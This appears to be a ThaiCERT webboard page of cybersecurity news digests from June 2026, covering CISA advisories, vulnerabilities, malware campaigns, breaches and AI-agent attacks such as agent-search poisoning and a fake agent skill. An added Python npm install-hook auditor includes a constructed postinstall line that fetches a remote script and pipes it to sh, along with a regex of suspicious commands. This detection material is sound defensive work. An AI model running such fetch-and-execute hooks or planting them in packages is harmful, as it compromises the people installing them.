NCSA Webboard
    NCSA_THAICERT

    @NCSA_THAICERT

    Website: www.ncsa.or.th/?fbclid=IwAR0BqJEC-CJzBs98rlBxUbZkNBgp1g814xdDNNaKnHTrxfqZhPD--ksY68I

    Global Moderator, administrators

    Latest posts made by NCSA_THAICERT

    • Apple fixes Beats Studio Buds vulnerability after a risk of eavesdropping through the microphone was found

      Follow news updates on the webboard or on the NCSA Thailand Facebook page.

      Posted in Cyber Security News
      NCSA_THAICERT
    • Xsolis discloses data breach affecting nearly 1.4 million individuals after a phishing attack

      Posted in Cyber Security News
      NCSA_THAICERT
    • Attack via WhatsApp found: hackers send VBScript files disguised as business documents to take control of systems

      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA adds four exploited vulnerabilities to its catalog

      On 23 June 2026 (B.E. 2569), the Cybersecurity and Infrastructure Security Agency (CISA) added four new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. The details are as follows:

      • CVE-2025-67038 Lantronix EDS5000 Code Injection Vulnerability
      • CVE-2026-34908 Ubiquiti UniFi OS Improper Access Control Vulnerability
      • CVE-2026-34909 Ubiquiti UniFi OS Path Traversal Vulnerability
      • CVE-2026-34910 Ubiquiti UniFi OS Improper Input Validation Vulnerability

      CISA continuously updates the KEV catalog and adds new vulnerabilities to it so that it covers the risks actually observed being exploited, now and in the future.

      Reference
      https://www.cisa.gov/news-events/alerts/2026/06/23/cisa-adds-four-known-exploited-vulnerabilities-catalog

      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA releases ten Industrial Control Systems (ICS) advisories

      On 23 June 2026 (B.E. 2569), the Cybersecurity and Infrastructure Security Agency (CISA) released ten advisories on industrial control systems (ICS) to provide timely information about security issues, vulnerabilities, and exploits affecting ICS. The details are as follows:

      • ICSA-26-174-01 Siemens WinCC Certificate Manager
      • ICSA-26-174-02 Siemens SIPROTEC 5
      • ICSA-26-174-03 Siemens Products using OpenSSL
      • ICSA-26-174-04 Siemens SINEC INS
      • ICSA-26-174-05 ABB Freelance Security Lock
      • ICSA-26-174-06 Impact of Linux Kernel vulnerabilities on B&R products
      • ICSA-26-174-07 Hubbell Aclara Metrum Cellular Web Interface
      • ICSA-25-317-04 Brightpick Mission Control / Internal Logic Control (Update A)
      • ICSA-24-345-06 Rockwell Automation Arena (Update C)
      • ICSA-26-111-06 Zero Motorcycles Firmware (Update A)

      Reference

      https://www.cisa.gov/news-events/ics-advisories

      Posted in OT Cyber Security News
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 24 June 2026

      Vulnerabilities

      • Cisco Unified CM Flaw CVE-2026-20230 Now Exploited In Attacks
        "A high-severity SSRF vulnerability, tracked as CVE-2026-20230, in Cisco Unified Communications Manager Server is now being exploited in attacks. Cisco released security updates for the CVE-2026-20230 flaw on June 3, warning that exploitation could give attackers root privileges on the device. "A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device," warned Cisco."
        https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/
      • Security Vulnerabilities Endanger Connections Via Libssh2
        "The open-source SSH library libssh2 is vulnerable. Attackers can exploit two security vulnerabilities to attack systems. In the worst case, malicious code can compromise computers. According to currently available information, the patch status is unclear. At the time of this report, there are no reports of attackers already exploiting the vulnerabilities. Companies use the library in sensitive areas of the network, for example, to remotely control routers and IoT devices and to manage servers. Consequently, successful attacks could have far-reaching consequences."
        https://www.heise.de/en/news/Security-vulnerabilities-endanger-connections-via-libssh2-11339594.html
      • Eight-Year-Old Samsung KNOX Flaw Exposed Millions Of Galaxy Devices To Kernel Attacks
        "Researchers found an eight-year-old high severity vulnerability affecting nearly all Samsung devices from the Galaxy S9 to S25 living within the KNOX kernel. The flaw (CVE-2026-20971, CVSS 7.8) could be exploited through the interaction between PROCA and FIVE. PROCA, the process authenticator, is a proprietary subsystem in the kernel of the Samsung devices designed to prevent unauthorized processes from executing. It validates process authenticity using FIVE, the kernel side integrity subsystem, based on the Linux integrity-measurement model and extended by Samsung."
        https://www.securityweek.com/eight-year-old-samsung-knox-flaw-exposed-millions-of-galaxy-devices-to-kernel-attacks/
      • Vendor-Signed UEFI Applications Found Vulnerable To Secure Boot Bypass
        "Multiple vendor-signed UEFI applications are vulnerable to Secure Boot bypass via a "Bring Your Own Vulnerable Driver" (BYOVD)-style attack. If a target system trusts the affected vendor’s certificate, an attacker can exploit these applications to execute arbitrary code during the early pre-boot phase before the operating system initializes. To mitigate this risk, system administrators should apply updates to the UEFI Forbidden Signature Database (DBX) that revoke trust in the affected vendor-signed binaries, preventing these vulnerable applications from executing during the boot process."
        https://kb.cert.org/vuls/id/457458

      Malware

      • “Free World Cup Stream” Sites Are Serving Scams, Not Football
        "With the World Cup on, you’ll find no shortage of websites promising every match, live, in HD, for free. They look convincing, usually with a video player, a “Live Stream Available” indicator, a row of server buttons, maybe a match schedule, and a “Watch Live” button. There’s no signup, no paywall, and seemingly, no catch. But of course there’s a catch. These sites aren’t really in the business of streaming football. What the page is really built to do is fire pop-ups, hidden ads, and redirects through an advertising network we detect as malicious. Instead of watching the match, visitors end up facing scams, malware, and fraudulent downloads."
        https://www.malwarebytes.com/blog/threat-intel/2026/06/free-world-cup-stream-sites-are-serving-scams-not-football
        https://www.helpnetsecurity.com/2026/06/23/fake-world-cup-streaming-sites-scams/
      • Phishing Through Collaboration: Outlook Groups As An Attack Path And The Usage Of CalPhishing
        "Fortra Intelligence and Research Experts (FIRE) is tracking phishing activity that abuses Outlook Groups and Microsoft 365 collaboration features to make malicious activity appear routine. The technique shifts malicious intent away from a single phishing email into a trusted productivity workflow. A user may see what looks like a normal group addition, internal update, shared resource, or calendar item before being pushed toward an action."
        https://www.fortra.com/blog/phishing-through-collaboration
        https://www.helpnetsecurity.com/2026/06/23/microsoft-365-collaboration-features-phishing/
      • From PostCSS Masquerading To Windows RAT
        "The package name is not random. The legitimate postcss-selector-parser package is widely used across the JavaScript build ecosystem, with npm reporting more than 150M weekly downloads. postcss-minify-selector-parser is not a classic one-character typo. Instead, it sits close enough to the legitimate package to look plausible during a quick dependency review. It uses the same postcss, selector, parser, and css keyword space, and it also depends on the real postcss-selector-parser. At the time of this report, the package remained live and accessible."
        https://research.jfrog.com/post/from-postcss-typosquat-to-windows-rat/
        https://thehackernews.com/2026/06/malicious-npm-packages-pose-as-postcss.html
        https://www.infosecurity-magazine.com/news/lookalike-npm-package-postcss/
      • GTA 6 Early Access Is Nothing But a Scam
        "A new wave of scam websites is offering something millions of people want: a way to play Grand Theft Auto VI before it comes out. “Get GTA 6 before everyone else.” “Buy VIP early access.” Pay a few hundred dollars in cryptocurrency, enter a payment code, and supposedly unlock the game. But it’s a scam."
        https://www.malwarebytes.com/blog/threat-intel/2026/06/gta-6-early-access-is-nothing-but-a-scam
        https://www.infosecurity-magazine.com/news/gta-6-scams-emerge-as-preorders/
        https://www.helpnetsecurity.com/2026/06/23/gta-6-early-access-scam/
      • From Langflow To Monero: Inside CVE-2026-33017 Cryptominer
        "This cryptocurrency-mining campaign shows how exposed AI application endpoints are becoming another route into enterprise environments. The payload might be familiar, but the delivery vector is not. A Langflow vulnerability gives commodity cryptominer operators a new front door into systems running AI application infrastructure."
        https://www.trendmicro.com/en_us/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html
      • Malware à La Mode: Tracking Dropping Elephant Tradecraft Through a China-Themed Loader Chain
        "Rapid7 researchers have identified a sophisticated malware campaign attributed to the threat actor "Dropping Elephant," characterized by the use of a China-themed decoy document to deliver a heavily reworked, in-memory remote access trojan (RAT). This campaign demonstrates advanced evasion techniques, including DLL side-loading with a legitimate Microsoft binary (Fondue.exe) and the use of "Donut" shellcode to map the RAT directly into memory, effectively bypassing traditional disk-based security controls."
        https://www.rapid7.com/blog/post/tr-malware-tracking-dropping-elephant-tradecraft-china-themed-loader-chain/
      • Cordyceps: The Silent Parasite Consuming Your Supply Chain
        "Novee identified a systemic class of exploitable CI/CD vulnerabilities across the open-source supply chain – command injection, broken authentication logic, artifact poisoning chains, and privilege escalation in GitHub Actions workflows. Our team scanned roughly 30,000 high-impact repositories, validated hundreds of fully exploitable attack chains, and received confirmation of fixes at dozens of organizations, including Microsoft, Google, Apache, Cloudflare, and the Python Software Foundation. There are millions of repositories that are potentially affected by this same pattern."
        https://novee.security/blog/cordyceps/
        https://www.darkreading.com/application-security/cordyceps-malicious-pull-requests-developer-workflows
        https://hackread.com/cordyceps-ci-cd-flaw-microsoft-google-apache-repos-hijack/
      • Inside The FortiBleed Open Directory: A Technical Analysis Of What The Attacker Left Behind
        "CloudSEK’s threat intelligence team is tracking FortiBleed, an active, large-scale credential-compromise campaign targeting internet-facing Fortinet FortiGate firewalls and SSL VPN gateways worldwide. Despite the name, FortiBleed is not a software vulnerability and is not linked to any newly disclosed Fortinet flaw or zero-day. It is the label given to a verified dataset of working device credentials that a threat group assembled through credential reuse, brute force, and offline hash cracking against exposed devices."
        https://www.cloudsek.com/blog/inside-the-fortibleed-open-directory-a-technical-analysis-of-what-the-attacker-left-behind
        https://www.helpnetsecurity.com/2026/06/23/fortibleed-investigation-remediation/
      • Payouts King Ransomware Initial Access Broker Deploys New Edgecution Malware
        "Zscaler ThreatLabz has been monitoring ransomware operations that align with tactics previously employed by an initial access broker affiliated with Payouts King ransomware. In recent attacks, the threat actor leverages social engineering tactics paired with an innovative malware delivery mechanism. The technique utilizes a malicious Microsoft Edge browser extension that exploits the Chrome native messaging protocol to interact with host-native applications beyond the confines of the browser sandbox. By abusing this interface, the attackers gain direct host access, enabling them to manipulate the local filesystem, launch processes, and execute arbitrary code on the compromised host. We have dubbed this web browser-based malware Edgecution."
        https://www.zscaler.com/blogs/security-research/payouts-king-ransomware-initial-access-broker-deploys-new-edgecution

      Breaches/Hacks/Leaks

      • Xsolis Data Breach Affects 1.4 Million Individuals
        "Healthcare technology company Xsolis, Inc. has disclosed a data breach affecting nearly 1.4 million individuals. Tennessee-based Xsolis provides utilization management and revenue cycle solutions for hospitals, health systems, and payers. The company published a data security notice in early June, revealing that unauthorized activity was detected on its systems on January 22. The intrusion resulted from a targeted phishing attack carried out two days earlier."
        https://www.securityweek.com/xsolis-data-breach-affects-1-4-million-individuals/
        https://www.bleepingcomputer.com/news/security/healthtech-firm-xolis-suffers-data-breach-impacting-14-million-people/
        https://securityaffairs.com/194067/cyber-crime/xsolis-data-breach-impacts-1-4-million-people.html
        https://www.bankinfosecurity.com/xsolis-hack-affecting-14m-raises-ai-vendor-risk-concerns-a-32051
      • Tata Electronics Confirms Cyberattack As Hackers Leak Data
        "Tata Electronics has confirmed in a statement to BleepingComputer that it was the target of a cyberattack that impacted parts of its IT infrastructure. The company emphasizes that its operations continued to run normally and were not affected by the incident. "A few weeks ago, Tata Electronics identified a cybersecurity incident on some of our systems,” a Tata Electronics spokesperson told BleepingComputer."
        https://www.bleepingcomputer.com/news/security/tata-electronics-confirms-cyberattack-as-hackers-leak-data/
        https://therecord.media/tata-electronics-confirms-cyberattack
      • LastPass Confirms Data Breach In Klue Supply Chain Attack
        "LastPass announced that hackers accessed customer data from its Salesforce environment after stealing the company's OAuth tokens in the Klue supply chain attack earlier this month. The password management platform says its products, services, and infrastructure were not affected by the incident and that customer vaults remained secure. “On June 12th, LastPass was made aware of an incident that occurred at Klue (klue.com), a third-party market intelligence platform utilized by our go-to-market teams, which integrates with our Salesforce and Gong systems,” LastPass says."
        https://www.bleepingcomputer.com/news/security/lastpass-confirms-data-breach-in-klue-supply-chain-attack/
        https://blog.lastpass.com/posts/klue-supply-chain-incident-and-lastpass-response
        https://www.darkreading.com/cyberattacks-data-breaches/scope-salesforce-attacks-expands-icarus-leaks-data
        https://hackread.com/lastpass-customer-data-breach-klue-oauth-token/

      General News

      • Nearly Half Of LG Smart TV Apps Are Laced With Proxies
        "Everyone worries about the apps on their phone. Almost no one looks at the ones on their TV. We scanned 6,038 of them across LG and Samsung; 2,058 were selling your IP address. On screen, it's a relaxing fish tank. Or a clock. Or solitaire. Or puppies. Under the hood, it is a residential proxy: software that can send other people's internet traffic out through your living room. And we found it everywhere."
        https://spur.us/blog/smart-tv-apps-residential-proxy-sdks
        https://www.helpnetsecurity.com/2026/06/23/tv-residential-proxy-sdk/
      • Only 7% Of Companies Are Ready For The AI Agents They Deployed
        "Most organizations now run or pilot AI agents that operate on company data with limited human direction at each step, a share that reaches 88% in Veeam Software’s Data and AI Trust Gap report. The systems that are supposed to keep an eye on them have not caught up. That gap is the heart of the report. Most executives say their data problems are already holding their AI back. The issues are familiar ones: data that is out of date, data that contradicts itself, and data locked away in systems that do not talk to each other. An agent acting on shaky data does more than make a single mistake. It can repeat that mistake across thousands of decisions before anyone notices."
        https://www.helpnetsecurity.com/2026/06/23/ai-trust-gap-research/
      • Daybreak: Tools For Securing Every Organization In The World
        "We’re expanding Daybreak⁠ to help democratize patching vulnerable software at machine speed. For example, we’ve applied our models to discover and generate patches for critical vulnerabilities⁠ in major browsers, network infrastructure, and operating systems such as FreeBSD and the Linux kernel. To scale the impact of these capabilities:"
        https://openai.com/index/daybreak-securing-the-world/
        https://thehackernews.com/2026/06/openai-expands-daybreak-with-gpt-55.html
        https://www.infosecurity-magazine.com/news/openai-daybreak-gpt-5-5-cyber/
        https://www.securityweek.com/openai-refocuses-cybersecurity-efforts-on-patching-over-discovery/
        https://www.helpnetsecurity.com/2026/06/23/openai-expanded-daybreak-cybersecurity-initiative/
      • Scattered Spider Teens Convicted Of TfL Cyber-Attack
        "Two British youngsters who hacked Transport for London (TfL) in 2024 have pleaded guilty to their crimes, according to the National Crime Agency (NCA). Thalha Jubair, 20, from East London, and Owen Flowers, 18, from Walsall, West Midlands, were teenagers when they hacked London’s transport authority between August 31 and September 3 2024. Both are said to be members of the infamous Scattered Spider collective. The incident cost TfL £29m ($38m) in loss and recovery costs, according to the NCA. It apparently impacted TfL’s customer refund system for some time, downed the application system for Oyster photocards for children and young people, and forced all 28,000 employees to attend a TfL office for a password reset."
        https://www.infosecurity-magazine.com/news/scattered-spider-teens-convicted/
        https://therecord.media/guilty-plea-tfl-cyberattack-scattered-spider-members
        https://www.bleepingcomputer.com/news/security/scattered-spider-members-plead-guilty-to-hacking-transport-for-london/
        https://hackread.com/scattered-spider-hackers-guilty-tfl-cyberattack/
        https://www.bankinfosecurity.com/2-british-men-plead-guilty-to-transport-for-london-hacks-a-32048
      • Algerian Man Extradited To US For Running Cybercrime Marketplaces
        "Abdellah Belmili, a 26-year-old Algerian national, was recently arrested in Spain and extradited to the United States, where he faces up to 30 years in prison for allegedly running two cybercrime marketplaces. According to the US Justice Department, Belmili, also known as Dila Belmili and Spox, was the administrator of a cybercrime marketplace called Market0Day between September and December 2020. Authorities said Spox was known for developing phishing kits targeting major American financial institutions."
        https://www.securityweek.com/algerian-man-extradited-to-us-for-running-cybercrime-marketplaces/
        https://cyberscoop.com/algerian-man-charged-cybercrime-marketplaces/
      • He Thought He Was Secure; His Phone Number Got Stolen Anyway
        "Torsten George, chief cybersecurity evangelist at ID Dataweb, Inc., felt helpless as he sat with his personal cell phone up to one ear and realized he was in the throes of an active attack. The person on the other end claimed to be an AT&T customer service representative looking to give George a discount for being a loyal customer. But it didn't take long to recognize that the “representative” was a threat actor with inside information on George's account history, derived through social engineering."
        https://www.darkreading.com/cyber-risk/how-a-sim-swap-attack-led-to-a-near-account-takeover
      • CISO Conversations: Carl Froggett – Combining CISO And CIO At Deep Instinct
        "Carl Froggett combines CISO and CIO. He currently occupies both positions at Deep Instinct. Before then, he was CISO at Citi for almost 17 years. Froggett has long believed the two roles overlap, making a combined role attractive. But it doesn’t work for all companies. Citi has more than 200,000 employees. Deep Instinct has fewer than 200. Combining CISO and CIO would be too much for one person at Citi, but works well at Deep Instinct."
        https://www.securityweek.com/ciso-conversations-carl-froggett-combining-ciso-and-cio-at-deep-instinct/
      • Justice Department Seizes Backend Infrastructure Used By The Huione Group For Money Laundering Services
        "Today, the Justice Department announced the seizure of a cloud computing account used by subsidiaries of the Huione Group, a Cambodia-based corporate conglomerate. These subsidiaries are alleged to have assisted individuals and organizations in transferring proceeds of cryptocurrency investment frauds, cyber scams, and other criminal activities on cryptocurrency blockchains and allowing for the conversion of the proceeds of these schemes to the legitimate banking sector undetected. The seized account hosted backend infrastructure for the subsidiaries."
        https://www.justice.gov/opa/pr/justice-department-seizes-backend-infrastructure-used-huione-group-money-laundering-services
        https://home.treasury.gov/news/press-releases/sb0538
        https://therecord.media/feds-seize-alleged-cyber-scam-infrastructure-southeast-asia
        https://cyberscoop.com/doj-huione-group-cybercrime-seizure/
      • Using Reddit To Manipulate AI Search Results Is Surprisingly Easy
        "A Reddit comment that takes only a few seconds to write can end up influencing the answers generated by AI research tools. A Cornell Tech study found that a short snippet of user-generated text, sometimes as little as 13 words, was enough to affect the output of deep-research agents, AI systems that search the web, gather information from multiple sources, and generate reports with citations. The risks of relying on community-generated content are already familiar to many internet users. Google’s AI Overviews famously recommended adding glue to pizza sauce after pulling information from an old joke Reddit post."
        https://www.helpnetsecurity.com/2026/06/23/reddit-ai-search-poisoning-research/
        https://arxiv.org/pdf/2605.24245
      • Inside The Dark Web: Stolen Identities For 95¢, Malware, And Scams-For-Hire
        "Most people have heard of the dark web, but few understand what it actually looks like or what goes on there. To separate fact from fiction, our research team spent 48 hours exploring it firsthand and documenting what we found. The dark web isn’t inherently bad. It also serves legitimate purposes, providing a layer of privacy for journalists, whistleblowers, activists, and others who need to communicate anonymously. Accessing it typically requires the Tor browser, and a number of reputable organizations operate official dark web sites."
        https://www.malwarebytes.com/blog/threat-intel/2026/06/inside-the-dark-web-stolen-identities-for-95¢-malware-and-scams-for-hire
      • Software-Defined Warfare: Crossing The Chasm In Two Software Areas
        "Software-defined warfare is today’s reality for national security, shifting the emphasis in military operations from hardware to software, “the core of every weapon and supporting system” fielded for defense. The Atlantic Council’s 2025 Commission on Software-Defined Warfare: Final Report defines software-defined warfare as the “continuous integration and delivery of cutting-edge technology and leading interoperable software into legacy and future defense systems.” The report emphasizes the need for speed through artificial intelligence (AI) by calling on national security organizations to “acquire and sustain unified, shared platforms that support and accelerate the end-to-end development, deployment, and governance of AI solutions.”"
        https://www.sei.cmu.edu/blog/software-defined-warfare-crossing-the-chasm-in-two-software-areas/
      • Fake AI Agent Skill Passed Security Scans And Reportedly Reached 26,000 Agents
        "Security firm AIR built a fake AI agent skill, pushed it through a popular skill marketplace and an Instagram ad, and says it reached roughly 26,000 agents, including some on corporate accounts. Every skill security scanner the firm tested it against marked it safe. The payload was harmless by design: it collected the user's email address and did nothing else. The point was to show that none of the signals people lean on to trust a skill caught it: not the scanners, not the GitHub stars, not the open-source reputation."
        https://thehackernews.com/2026/06/fake-ai-agent-skill-passed-security.html

      Reference

      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 23 June 2026

      New Tooling

      • Agent Beacon: Open-Source Telemetry Layer For AI Agents
        "AI coding agents such as Claude Code, Codex CLI, Cursor, and Claude Cowork run on developer laptops, CI jobs, cloud environments, where they edit files, run commands, and call outside tools. Beacon, an open-source project from Asymptote Labs, configures telemetry for those runtimes and writes a normalized record of what each agent does across local, CI, and cloud-agent surfaces."
        https://www.helpnetsecurity.com/2026/06/22/agent-beacon-open-source-telemetry-layer-ai-agents/
        https://github.com/Asymptote-Labs/agent-beacon/
      • Sniff Out Stale AI Override Advice With This Open Source CLI
        "The JavaScript development ecosystem may be a security nightmare, but it's also ripe for improvement. One such tool is the CVE Lite CLI, a free open source dependency scanner that helps reduce the risk of software supply chain attacks. It runs locally and provides actionable vulnerability fixes, if any are available. The tool, endorsed by OWASP, has recently been updated to include override auditing, which has the potential to avert transitive dependency vulnerabilities such as the March 2022 node-ipc package incident."
        https://www.theregister.com/security/2026/06/23/sniff-out-stale-ai-override-advice-with-this-open-source-cli/5259853
        https://owasp.org/cve-lite-cli/

      Vulnerabilities

      • PixelSmash – Critical FFmpeg Vulnerability Turns Media Files Into Weapons
        "JFrog Security Research recently discovered and disclosed a critical vulnerability in FFmpeg, the world’s most widely deployed media processing framework. The discovered vulnerability, which we’ve named PixelSmash, is CVE-2026-8461 – a heap out-of-bounds write in the MagicYUV decoder (CVSS 8.8 High). We escalated this vulnerability from a simple crash all the way to reliable remote code execution – all it takes is processing a single malicious media file."
        https://jfrog.com/blog/pixelsmash-critical-ffmpeg-vulnerability-turns-media-files-into-weapons/
        https://www.bleepingcomputer.com/news/security/ffmpeg-fixes-pixelsmash-flaw-in-widely-used-video-decoder/
      • Squidbleed (CVE-2026-47729)
        "Two weeks ago, we dropped an HTTP/2 bomb cooked up by Codex Cyber. This time, we sent Claude Mythos Preview spelunking through Squid’s guts, and it surfaced clutching a 29-year-old bug. Meet Squidbleed: a Heartbleed-style vulnerability that leaks internal memory from every version of Squid Proxy, in its default configuration."
        https://blog.calif.io/p/squidbleed-cve-2026-47729
        https://thehackernews.com/2026/06/29-year-old-squid-proxy-bug-squidbleed.html
        https://www.securityweek.com/decades-old-squid-proxy-flaw-squidbleed-can-expose-user-data/
      • DifyTap: Zafran Discovers How Attackers Can Silently Wiretap AI Data Across Tenants On a Platform Powering 1M+ Apps
        "Zafran Security uncovered four vulnerabilities in Dify, the open-source AI platform powering over one million applications and used by enterprises including Volvo, Maersk, Panasonic, and Thermo Fisher. Two were critical severity, two required no authentication, and three carried cross-tenant impact on Dify's multi-tenant cloud service, allowing one customer's data to be exposed to another."
        https://www.zafran.io/resources/difytap-zafran-discovers-how-attackers-can-silently-wiretap-ai-data-across-tenants-on-a-platform-powering-1m-apps
        https://thehackernews.com/2026/06/researchers-detail-difytap-flaws-in.html
      • The Global Namespace Risk: Universal Bucket Hijacking Technique For Cloud Data Exfiltration
        "We recently identified a bucket hijacking technique impacting multiple services across major cloud service providers (CSPs). The attack technique exploits a fundamental architectural flaw that is common across cloud providers and could potentially affect other cloud providers as well. Our research reveals that an attacker can silently compromise an organization's active data streams by rerouting data into an external storage bucket. Because a storage bucket name is globally unique, an attacker can simply delete the bucket and then recreate it under the attacker's own account using the same name. This therefore creates a global namespace risk. This bucket hijacking reroutes critical logs and sensitive data directly to the attacker’s environment."
        https://unit42.paloaltonetworks.com/cloud-bucket-hijacking-risks/

      Malware

      • A VBScript Campaign Distributed Through WhatsApp Deploying RMM Software
        "In June 2026, we observed a malware campaign distributing malicious VBScript files through direct messages in WhatsApp. The campaign affected users across multiple countries and territories, including Malaysia, Brazil, India, Mexico, Singapore, UK, Spain, Taiwan, Australia, Russia and Vietnam, with the highest number of victims observed in Malaysia. At the time of writing this article, the campaign is still active."
        https://securelist.com/whatsapp-vbs-rmm-campaign/120290/
        https://www.bleepingcomputer.com/news/security/whatsapp-phishing-attack-uses-fake-business-docs-to-hack-pcs/
        https://securityaffairs.com/194031/malware/whatsapp-malware-campaign-hijacks-trust-installs-legitimate-admin-tools.html
      • Dismantling FortiBleed: Inside a Russian Fortinet Compromise Operation
        "Dismantling FortiBleed investigates an active credential-harvesting operation identified by the SOCRadar Threat Research Unit (STRU). The report traces the campaign from large-scale reconnaissance and credential sourcing through initial access, passive sniffer deployment, offline hash cracking, and targeted exfiltration. STRU assesses the operator to be an Initial Access Broker (IAB) motivated by financial gain, with tooling comments in the Cyrillic alphabet pointing to a likely Russian origin. The investigation began with a single exposed directory flagged by researcher Volodymyr “Bob” Diachenko and expanded into more than 260 operation servers."
        https://socradar.io/resources/whitepapers/dismantling-fortibleed-inside-a-russian-fortinet-compromise-operation/
        https://www.bleepingcomputer.com/news/security/fortibleed-campaign-used-custom-fortigate-sniffer-to-steal-credentials/
        https://securityaffairs.com/194004/hacking/fortibleed-the-most-detailed-breakdown-yet-of-an-active-russian-credential-harvesting-operation.html
      • More Than 4,000 Legacy Routers Compromised By AryStinger, Turned Into Global Attack Proxies For Hackers
        "On May 20, 2026, the Ministry of State Security's WeChat official account published an article 'Your internet is slow, and the culprit turns out to be this!', highlighting that outdated routers are becoming a key entry point for threat actors to conduct cyber espionage. Inspired by this article, we feel it is imperative to take the compromise of old routers seriously. This article introduces an unusual attack campaign observed within QiAnXin XLab's field of view, specifically targeting router devices based on the RTL819X series chips. The mainstream active period of the RTL819X series chips was concentrated around 2012 to 2015. The attackers exploited vulnerabilities disclosed 13 years ago to compromise a large number of old routers, building reconnaissance and attack clusters for use in the pre-intrusion footprinting stage. (Note: The campaign disclosed in this article has no direct relationship to what the Ministry of State Security described.)"
        https://blog.xlab.qianxin.com/arystinger-botnet-hijacks-legacy-routers-for-global-attacks-en/
        https://thehackernews.com/2026/06/arystinger-malware-infects-4300-legacy.html
        https://www.bleepingcomputer.com/news/security/arystinger-botnet-infected-thousands-of-d-link-routers-worldwide/
        https://www.bankinfosecurity.com/arystinger-botnet-converts-legacy-routers-to-global-proxies-a-32045
        https://www.malwarebytes.com/blog/news/2026/06/thousands-of-d-link-routers-under-control-of-arystinger-botnet
        https://securityaffairs.com/193987/security/4300-outdated-routers-hijacked-in-stealthy-spy-infrastructure-by-arystinger-malware.html
      • Prinz Eugen Ransomware: a Deep Dive Into a New Go-Based Encryptor
        "On May 11, 2026, our research team investigated a customer infected with a brand-new ransomware family called Prinz Eugen. The encryptor is freshly built, written in Go, and more technically deliberate than many first-wave ransomware samples. It performs recursive encryption, prioritizes recently modified files, uses ChaCha20-Poly1305 with integrity checks, and leaves no ransom note on disk. The first public report related to this family is dated April 16, when a public social media post noted that a new ransomware leak portal had appeared to extort Standard Bank Group, a leading financial institution in South Africa."
        https://www.threatdown.com/blog/prinz-eugen-ransomware-a-deep-dive-into-a-new-go-based-encryptor/
        https://www.bleepingcomputer.com/news/security/new-prinz-eugen-ransomware-prioritizes-recent-files-for-encryption/
      • From Package To Postinstall Payload: Inside The Mastra Npm Supply Chain Compromise By Sapphire Sleet
        "Microsoft assesses with high confidence that this activity is attributable to Sapphire Sleet, a North Korean state actor that primarily targets the financial sector. The infrastructure and post-compromise TTPs observed in this campaign are consistent with previously documented Sapphire Sleet activity. Sapphire Sleet also conducted a separate npm supply chain compromise affecting Axios, a popular JavaScript HTTP client, in April 2026."
        https://www.microsoft.com/en-us/security/blog/2026/06/17/postinstall-payload-inside-mastra-npm-supply-chain-compromise/
        https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/
        https://www.infosecurity-magazine.com/news/mastra-ai-supply-chain-attack/
        https://www.securityweek.com/north-korean-hackers-blamed-for-mastra-npm-supply-chain-attack/
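        Added example, not Microsoft's or the Mastra project's code: a Python walk over node_modules that lists every package carrying an install-time lifecycle hook (preinstall, install, postinstall, prepare), which npm runs automatically during installation, and flags commands that fetch or decode something at that point. The sample tree, the package names and the suspicious-pattern list are constructed for the example.

```python
import json
import os
import re
import shutil
import tempfile

# npm lifecycle hooks that execute automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed markers for an install script that downloads, decodes or spawns
# something at install time; tune for your own tree.
SUSPICIOUS = re.compile(
    r"node\s+-e\b|curl\b|wget\b|powershell|base64|eval\(|child_process|\|\s*(?:ba)?sh\b",
    re.IGNORECASE,
)


def audit_install_scripts(root):
    """Read every package.json under root and report its install-time hooks."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, do not abort the audit
        scripts = pkg.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if not cmd:
                continue
            findings.append({
                "package": pkg.get("name", "?"),
                "version": pkg.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "suspicious": bool(SUSPICIOUS.search(cmd)),
                "path": os.path.relpath(path, root),
            })
    return findings


def build_sample_tree():
    """Write a constructed node_modules tree into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="npm-audit-")
    manifests = {
        "node_modules/native-addon/package.json": {
            "name": "native-addon", "version": "2.1.0",
            "scripts": {"install": "node-gyp rebuild"},      # legitimate native build
        },
        "node_modules/@acme/trojaned-agent/package.json": {
            "name": "@acme/trojaned-agent", "version": "0.9.3",
            "scripts": {
                # constructed: a second-stage fetch hidden in a postinstall hook
                "postinstall": "node -e \"require('child_process')"
                               ".execSync('curl -s https://example.invalid/x | sh')\"",
                "test": "jest",
            },
        },
        "node_modules/left-pad-ish/package.json": {
            "name": "left-pad-ish", "version": "1.0.0", "scripts": {"test": "mocha"},
        },
    }
    for rel, manifest in manifests.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


def run_example():
    root = build_sample_tree()
    try:
        return sorted(audit_install_scripts(root), key=lambda f: f["package"])
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for f in run_example():
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10s} {f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

        Installing with ignore-scripts=true in .npmrc and then running `npm rebuild` only for the native packages that genuinely need a build step closes the postinstall channel this compromise used; a hook that appears on a package whose previous version had none is the first thing to inspect.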
      • Threat Hunting Beyond Alerts: Finding The Activity Detection Misses
